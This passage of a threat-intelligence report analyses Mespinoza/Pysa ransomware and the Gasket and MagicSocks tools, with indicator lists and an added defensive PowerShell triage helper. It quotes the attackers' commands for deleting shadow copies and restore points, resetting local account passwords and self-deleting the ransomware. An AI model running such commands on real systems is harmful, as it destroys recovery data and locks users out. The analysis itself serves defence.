First, the pre-deployment PowerShell script attempts to disable or remove both Malwarebytes and Windows Defender antivirus software from the system. The script then attempts to stop services whose display name contains one of the substrings in Table 9. These names suggest the actors want database, email and backup services stopped before the ransomware runs, so that the files those services hold open can be encrypted.\r\nSQL, Exchange, Sharepoint, Oracle, Veeam, Quest, Citrix, Malwarebytes, Backup\r\nTable 9. Service display-name substrings stopped by the Mespinoza pre-deployment script.\r\nThe script also uses the Windows Management Instrumentation command-line utility (wmic) to find and kill processes whose name contains one of the substrings in Table 10. The process names targeted include popular browsers, endpoint protection, productivity, database and server processes.\r\nAgent Backup apache office manage\r\nMalware QuickBooks web anydesk acronis\r\nEndpoint QBDB vnc protect endpoint\r\nCitrix QBData teamviewer secure autodesk\r\nsql QBCF OCS Inventory segurda database\r\nSQL server monitor center adobe\r\nVeeam citrix security agent java\r\nCore.Service sage def silverlight logmein\r\nMongo http dev exchange microsoft\r\nsolarwinds engine AlwaysOn Framework sprout\r\nfirefox chrome barracuda veeam arcserve\r\nTable 10. Process-name substrings killed by the Mespinoza pre-deployment script (rows reproduced as laid out in the original table).\r\nThe PowerShell script also attempts to delete the system's restore points and volume shadow copies via the following commands:\r\nGet-ComputerRestorePoint | Delete-ComputerRestorePoint\r\nvssadmin delete shadows /all /quiet\r\nThe script further degrades the ability to use the systems by changing the passwords of the local user accounts. 
To carry this out, the PowerShell script obtains a list of local user accounts on the current system by running the following command:\r\nGet-WmiObject -Class Win32_UserAccount -ComputerName $env:COMPUTERNAME -Filter LocalAccount='true' | select -ExpandProperty name\r\nIt then iterates through all of the local user accounts, appends the string pysa to each username, generates the MD5 hash of the resulting string and sets the user’s password to the first 13 characters of that hash by running the following command:\r\n([adsi]\"WinNT://$env:COMPUTERNAME/$user\").SetPassword(\"$pass\");\r\nTo determine whether the pre-deployment script ran successfully on the end system, the actor added a command that creates a file in a shared folder on the distribution system, named after the system the script ran on. The command writes “I'll be back.” to this file, which suggests that the actor expects to revisit the system to deploy the ransomware. The PowerShell command that performs this appears as follows, where “[redacted]” replaces the IP address of the distribution system:\r\nNew-Item -Path \"\\\\[redacted]\\log$\" -Name \"$name.txt\" -ItemType \"file\" -Value \"I'll be back.\";\r\nRansomware\r\nMespinoza ransomware starts by creating a mutex named Pysa, Pysa being another alias for this ransomware family. It then enumerates the file system and writes the ransom message shown in Figure 10 to a file named Readme.README in each folder.\r\nFigure 10. Mespinoza ransomware note.\r\nThe ransomware will omit writing the ransom message and will not encrypt files in folders that have any of the following within their path:\r\n:\\Windows\\\r\n\\Boot\\\r\n\\BOOTSECT\r\n\\pagefile\r\n\\System Volume Information\\\r\nbootmgr\r\n\\Recovery\r\n\\Microsoft\r\nThe ransomware also writes to the registry so that the ransom message is displayed at system startup: under the key SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System it sets the legalnoticecaption value to PYSA and the legalnoticetext value to the same ransom message shown above.\r\nThe ransomware encrypts files using an RSA public key and the AES-CBC cipher, after which it renames each encrypted file to change its extension to .pysa. Before encrypting each file, the ransomware checks the file's extension against the following exclusion list:\r\n.README, .docx, .myd, .backupdb, .vfd, .vbm, .pysa, .xlsx, .ndf, .bck, .avhdx, .vrb, .exe, .pdf, .sdf, .bkf, .vmcx, .win, .dll, .db, .trc, .bkup, .vmrs, .pst, .sys, .db3, .wrk, .bup, .pbf, .mdb, .search-ms, .frm, .001, .fbk, .qic, .7z, .sql, .ib, .acr, .mig, .sqb, .zip, .doc, .mdf, .bac, .spf, .tis, .rar, .xls, .mwb, .bak, .vhdx, .vbk, .cad, .dsd, .dwg, .pla, .pln\r\nTable 11. Encryption exclusion list using file extensions.\r\nThe ransomware finishes by creating a batch script at %TEMP%\\update.bat with the following contents, which it runs to delete the ransomware and the batch script from the system:\r\n:Repeat\r\ndel \"\u003cransomware filename\u003e.exe\"\r\nif exist \"\u003cransomware filename\u003e.exe\" goto Repeat\r\nrmdir \"\u003cfolder containing ransomware\u003e\"\r\ndel %TEMP%\\update.bat\r\nRelated Tools\r\nThe actors appear to have paired a pre-deployment PowerShell script of this kind with Mespinoza deployments since at least March 2021.\r\n
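\r\nTwo responder-side helpers follow as an added example, not code from the Unit 42 post or from the actors' scripts. The first reproduces the password the pre-deployment script assigns to each local account (the first 13 characters of the MD5 of the username with pysa appended, as described above), so that an affected host can still be logged into during response; that the hash is rendered as lowercase hex is an assumption. The second checks a host for the artifacts described in the Deployment and Ransomware sections: the Pysa mutex, the PYSA legalnotice values, the %TEMP%\\update.bat self-delete script, a ransomware copy staged at C:\\Windows\\Temp\\svchost.exe, Readme.README notes and .pysa files. Function names are this example's own.\r\n```powershell\r\n# Added example (not from the Unit 42 post or the actors' scripts): responder helpers for\r\n# the pre-deployment password reset and for host triage. Lowercase hex for the MD5 is an\r\n# assumption; Get-PysaResetPasswordTable needs a Windows host.\r\nfunction Get-PysaResetPassword {\r\n    param([Parameter(Mandatory)][string]$UserName)\r\n    $md5   = [System.Security.Cryptography.MD5]::Create()\r\n    $bytes = [System.Text.Encoding]::UTF8.GetBytes($UserName + 'pysa')\r\n    $hex   = ($md5.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') }) -join ''\r\n    return $hex.Substring(0, 13)\r\n}\r\n\r\nfunction Get-PysaResetPasswordTable {\r\n    # Same local-account enumeration the actors' script performs, via CIM rather than Get-WmiObject.\r\n    Get-CimInstance -ClassName Win32_UserAccount -Filter \"LocalAccount='True'\" | ForEach-Object {\r\n        [pscustomobject]@{ User = $_.Name; ResetPassword = Get-PysaResetPassword -UserName $_.Name }\r\n    }\r\n}\r\n\r\nfunction Test-PysaArtifacts {\r\n    param([string[]]$ScanRoots = @())\r\n    $findings = New-Object System.Collections.Generic.List[string]\r\n\r\n    # Mutex \"Pysa\": OpenExisting throws when no such mutex exists.\r\n    try {\r\n        $m = [System.Threading.Mutex]::OpenExisting('Pysa'); $m.Dispose()\r\n        $findings.Add('mutex \"Pysa\" is present (ransomware may be running)')\r\n    } catch [System.Threading.WaitHandleCannotBeOpenedException] { }\r\n    catch { }   # access denied, or named mutexes unsupported on this platform\r\n\r\n    # Registry: legalnoticecaption = PYSA under the logon policy key.\r\n    $polKey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\r\n    if (Test-Path $polKey) {\r\n        $cap = (Get-ItemProperty -Path $polKey -ErrorAction SilentlyContinue).legalnoticecaption\r\n        if ($cap -eq 'PYSA') { $findings.Add(\"legalnoticecaption is PYSA in $polKey\") }\r\n    }\r\n\r\n    # Self-delete script at %TEMP%\\update.bat, which starts with the :Repeat label.\r\n    $bat = Join-Path ([System.IO.Path]::GetTempPath()) 'update.bat'\r\n    if ((Test-Path $bat) -and (Select-String -Path $bat -Pattern '^:Repeat' -Quiet)) {\r\n        $findings.Add(\"self-delete script at $bat\")\r\n    }\r\n\r\n    # Staging path the PsExec batch scripts copy the ransomware to.\r\n    if ($env:SystemRoot) {\r\n        $staged = Join-Path $env:SystemRoot 'Temp\\svchost.exe'\r\n        if (Test-Path $staged) { $findings.Add(\"ransomware copy staged at $staged\") }\r\n    }\r\n\r\n    # Ransom notes and encrypted files under the requested roots.\r\n    foreach ($root in $ScanRoots) {\r\n        if (-not (Test-Path $root)) { continue }\r\n        Get-ChildItem -Path $root -Recurse -File -Force -ErrorAction SilentlyContinue |\r\n            Where-Object { $_.Name -eq 'Readme.README' -or $_.Extension -eq '.pysa' } |\r\n            ForEach-Object { $findings.Add(\"artifact: $($_.FullName)\") }\r\n    }\r\n    return $findings\r\n}\r\n\r\n# Usage: derive the reset password for one account, then triage the user profiles.\r\nGet-PysaResetPassword -UserName 'Administrator'\r\nTest-PysaArtifacts -ScanRoots @(\"$env:SystemDrive\\Users\")\r\n```\r\nBecause the reset password is a pure function of the account name, every host the script touched shares the same per-account value, so recovering it once is enough to regain access across the estate. Rotate those accounts as soon as access is regained, since the actors know the same derivation.\r\n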
We found another pre-deployment script ‘p.ps1’ (SHA256: 7193d6f3c621596e845694c1348e90ea5a9d99d756c9e9fe5063860cd1ee3838) used prior to a Mespinoza/Pysa ransomware sample (SHA256: 90cf35560032c380ddaaa05d9ed6baacbc7526a94a992a07fd02f92f371a8e92) whose ransom message used the following email addresses:\r\nluebegg8024@onionmail[.]org\r\nmayakinggw3732@onionmail[.]org\r\nlauriabornhat7722@protonmail[.]com\r\nWe found that the IP address 89.44.9[.]229 hosted a Gasket and a MagicSocks sample in the first week of September 2020. At the same time, this server also hosted two PowerShell scripts that gave us additional insight into the threat actors using these tools. The actors would likely use both scripts during post-exploitation, specifically for credential harvesting and to support lateral movement.\r\nOne of the scripts, keke.ps1, is a modified version of Invoke-Kerberoast with the comments and all of the lines that print messages to the screen (Write-Verbose) removed. The actor renamed the Invoke-Kerberoast function to mommm, which is run and writes its results to a file at C:\\Users\\Public\\logs. The actors removed the script's ability to output the gathered hashes in “John the Ripper” format, which suggests they favor the hashcat output format. We therefore believe this threat group exfiltrates the C:\\Users\\Public\\logs file and uses hashcat to try to recover credentials from it.\r\nThe second PowerShell script, try.ps1, attempts to split a file at the hardcoded path C:\\Users\\Public\\lsass.zip into 5 MB blocks, writing each block to a file with .[number].part appended to the filename. 
This script suggests that the group may dump the memory of the Local Security Authority Subsystem Service (LSASS) process and split the archive into smaller files so that it can be exfiltrated for credential harvesting on a remote system.\r\nConclusion\r\nIn a recent incident, threat actors deployed the Mespinoza (also known as Pysa) ransomware by accessing a system via remote desktop and running a series of batch scripts that use the PsExec tool to copy and execute the ransomware on other systems on the network. Before deploying the ransomware, the actor runs PowerShell scripts on those systems to exfiltrate files of interest and to maximize the impact of the ransomware.\r\nMespinoza attacks such as those documented in this report highlight several trends shared by many ransomware actors and families that make their attacks easy to carry out. As with other ransomware attacks, Mespinoza enters through the proverbial front door, internet-facing RDP servers, which removes the need to craft phishing emails, perform social engineering, exploit software vulnerabilities or undertake other more time-consuming and costly activities. Further costs are saved through the use of numerous open-source tools available online for free, or of built-in tools that let the actors live off the land, all of which improves the group's bottom line.\r\nFinding RDP servers on the internet can be easily automated. 
The 2021 Cortex Xpanse Attack Surface Threat Report found that RDP was the most common security issue among global enterprises, representing 32% of overall security issues.\r\nPalo Alto Networks Next-Generation Firewall customers are protected from Mespinoza, Gasket and MagicSocks via the following protections:\r\nAll known Gasket HTTP C2 traffic is detected in Threat Prevention.\r\nAll known Mespinoza, Gasket and MagicSocks samples receive malicious verdicts in WildFire.\r\nAll known Gasket and MagicSocks C2 domains have malicious verdicts in Advanced URL Filtering and are classified as Command \u0026 Control in PAN-DB.\r\nAll known domains for Gasket and MagicSocks C2 are detected in DNS Security.\r\nCortex XDR customers are protected through WildFire verdicts for all known Mespinoza, Gasket and MagicSocks samples and by Local Analysis for Gasket samples.\r\nAutoFocus customers can track the ransomware and associated tools used in this attack via the Mespinoza and Gasket tags.\r\nCortex Xpanse customers can assess and manage their network attack surface and generate an inventory of their systems.\r\nIndicators of Compromise\r\nGasket 
SHA256\r\n356671767c368e455f2261f7f76d9ee9bd0b522172490845b89281224ab5dbad\r\n5d8459c2170c296288e2c0dd9a77f5d973b22213af8fa0d276a8794ffe8dc159\r\n64b9b5874820ca26344c919b518d6c0599a991aaf1943a519da98d294bebf01f\r\na30e605fa404e3fcbfc50cb94482618add30f8d4dbd9b38ed595764760eb2e80\r\nb0629dcb1b95b7d7d65e1dad7549057c11b06600c319db494548c88ec690551e\r\nccfa2c14159a535ff1e5a42c5dcfb2a759a1f4b6a410028fd8b4640b4f7983c1\r\n0bcbc1faec0c44d157d5c8170be4764f290d34078516da5dcd8b5039ef54f5ca\r\n85c8ccf45cdb84e99cce74c376ce73fdf08fdd6d0a7809702e317c18a016b388\r\n8b5cdbd315da292bbbeb9ff4e933c98f0e3de37b5b813e87a6b9796e10fbe9e8\r\n701791cd5ed3e3b137dd121a0458977099bb194a4580f364802914483c72b3ce\r\naa2faf0f41cc1710caf736f9c966bf82528a97631e94c7a5d23eadcbe0a2b586\r\nd591f43fc34163c9adbcc98f51bb2771223cc78081e98839ca419e6efd711820\r\nef31b968c71b0e21d9b0674e3200f5a6eb1ebf6700756d4515da7800c2ee6a0f\r\nf8a5065eb53b1e3ac81748176f43dce1f9e06ea8db1ecfa38c146e8ea89fcc0b\r\n12b927235ab1a5eb87222ef34e88d4aababe23804ae12dc0807ca6b256c7281c\r\n045510eb6c86fc2d966aded8722f4c0e73690b5078771944ec1a842e50af4410\r\n6eb0455b0ab3073c88fcba0cad92f73cc53459f94008e57100dc741c23cf41a3\r\n2697bbe0e96c801ff615a97c2258ac27eec015077df5222d52f3fbbcdca901f5\r\nf5cb94aa3e1a4a8b6d107d12081e0770e95f08a96f0fc4d5214e8226d71e7eb7\r\n3a6ddc4022f6abe7bdb95a3ba491aaf7f9713bcb6db1fbaa299f7c68ab04d4f4\r\n7b5027bd231d8c62f70141fa4f50098d056009b46fa2fac16183d1321be04768\r\ne47a632bfd08e72d15517170b06c2de140f5f237b2f370e12fbb3ad4ff75f649\r\n8a9205709c6a1e5923c66b63addc1f833461df2c7e26d9176993f14de2a39d5b\r\n0fd13ece461511fbc129f6584d45fea920200116f41d6097e4dffeb965b19ef4\r\n6d1fde9a5963a672f5e4b35cc7b8eaa8520d830eb30c67fadf8ab82aeb28b81a\r\n89b9ba56ebe73362ef83e7197f85f6480c1e85384ad0bc2a76505ba97a681010\r\nc9bed25ab291953872c90126ce5283ce1ad5269ff8c1bca74a42468db7417045\r\naf97b35d9e30db252034129b7b3e4e6584d1268d00cde9654024ce460526f61e\r\n1b888acb22a8326bd5f80f840390182d00e0c8db416d29d042358b48d1220438\r\n9986b6881fc1df8f11
9a6ed693a7858c606aed291b0b2f2b3d9ed866337bdbde\r\nea3b35384e803bef3c02a8f27aea2c2a40f9a4d2726113e1c5f2bc3be9c41322\r\nd9c753b859414e4b38a0841423b159590c47ad580249b0cd3c99a0ecc6644914\r\n30bd30642bf83abd74b8b2312ea606e0f192b0d61351f1445d1a1458414992d3\r\n140224fb7af2d235e9c5c758e8acaee34c912e62fad625442e5ca4102d11e9e7\r\nc2ef84710937b622f35b2b8fab9f9aa86b718ba7bc77a40b33b92e40747676b5\r\nGasket C2\r\n160.20.147[.]184\r\n172.96.189[.]167\r\n172.96.189[.]22\r\n172.96.189[.]246\r\n185.183.96[.]147\r\n185.185.27[.]3\r\n185.186.245[.]85\r\n193.239.84[.]205\r\n193.239.85[.]55\r\n194.187.249[.]102\r\n194.187.249[.]138\r\n194.5.249[.]137\r\n194.5.249[.]138\r\n194.5.249[.]139\r\n194.5.249[.]18\r\n194.5.249[.]180\r\n194.5.250[.]151\r\n194.5.250[.]162\r\n194.5.250[.]216\r\n198.252.100[.]37\r\n23.83.133[.]136\r\n37.120.140[.]184\r\n37.120.140[.]247\r\n37.120.145[.]208\r\n37.221.113[.]66\r\n45.89.175[.]239\r\n45.147.228[.]49\r\n45.147.229[.]29\r\n45.147.230[.]162\r\n45.147.230[.]212\r\n86.106.20[.]144\r\n89.38.225[.]208\r\n89.41.26[.]173\r\naccounting-consult[.]xyz\r\nblitzz[.]best\r\ncvar99[.]xyz\r\ndowax[.]xyz\r\nenglish-breakfast[.]xyz\r\nenglishdialoge[.]xyz\r\nenglishdict[.]xyz\r\nfirefox-search[.]xyz\r\nntservicepack[.]com\r\nproductoccup[.]tech\r\npump-online[.]xyz\r\nreportservicefuture[.]website\r\nsbvjhs[.]club\r\nsbvjhs[.]xyz\r\nserchtext[.]xyz\r\nspm[.]best\r\nstarhouse[.]xyz\r\nstatistics-update[.]xyz\r\ntransnet[.]wiki\r\nvisual-translator[.]xyz\r\nwiki-text[.]xyz\r\nccenter[.]tech\r\nMagicSocks 
SHA256\r\n2f190f0a3a0f34113affc9edd02b9cacd0eb32cadb1d30a772aa0108e607dd5e\r\nd0b9124bc424982f52ac2af2ebbfbd343f224549543fcf77645c00e4c2c394a0\r\n04c44183426102b395679b009dfa194b648ce541dfb7a04f8e6f76571d8ac5d9\r\n0962cff47f985d5d8202b3cf73752f7e340f87ca82496618c28d37a666376d42\r\nf354b12bc070db12f1e6e9bb60acbb14e067f3469a1d560127256c999e80fd39\r\n0b29bce75c909b67f674b64cc42c5f6b57efae61bbfb071420cc47aa32b4881c\r\nMagicSocks C2\r\ncreatordampfe[.]xyz\r\n104.168.164[.]195\r\n172.96.189[.]86\r\n142.79.237[.]163\r\n23.227.206[.]158\r\nPre-Deployment Script\r\n897f5a1f4194f5c874547fdcd265de745a1e46da8077c7b68a3ea20f0a404bd0\r\n85761bf03d96111b90954cc8a5d38e250097ec649dd82ebd20946d03dec16714\r\na30f82a95519a55b58c25fa726934dad421ec5dac382be640a9ff016d9da44c7\r\n7193d6f3c621596e845694c1348e90ea5a9d99d756c9e9fe5063860cd1ee3838\r\n0951ca2d4ab7bec16a4145f757a59b0d1acdf3343e862ffa88f2d3f2243362bb\r\nRelated Mespinoza/PYSA SHA256\r\n90cf35560032c380ddaaa05d9ed6baacbc7526a94a992a07fd02f92f371a8e92\r\n44f1def68aef34687bfacf3668e56873f9d603fc6741d5da1209cc55bdc6f1f9\r\nRelated PowerShell Scripts SHA256\r\nf6ccf438c73e4e5ec91c62ffaf6a06aa316fc1ac8efbe903a4d689af47e14877\r\n5c31e73c7796e37a6f604fa0a588a8d3c9289191a7d60c47c8a5ac3f58e24233\r\nSource: https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/"
	],
	"report_names": [
		"gasket-and-magicsocks-tools-install-mespinoza-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434094,
	"ts_updated_at": 1775791199,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dbcc4e49360b245b8cbdfe54aed9bda18ce879a1.pdf",
		"text": "https://archive.orkl.eu/dbcc4e49360b245b8cbdfe54aed9bda18ce879a1.txt",
		"img": "https://archive.orkl.eu/dbcc4e49360b245b8cbdfe54aed9bda18ce879a1.jpg"
	}
}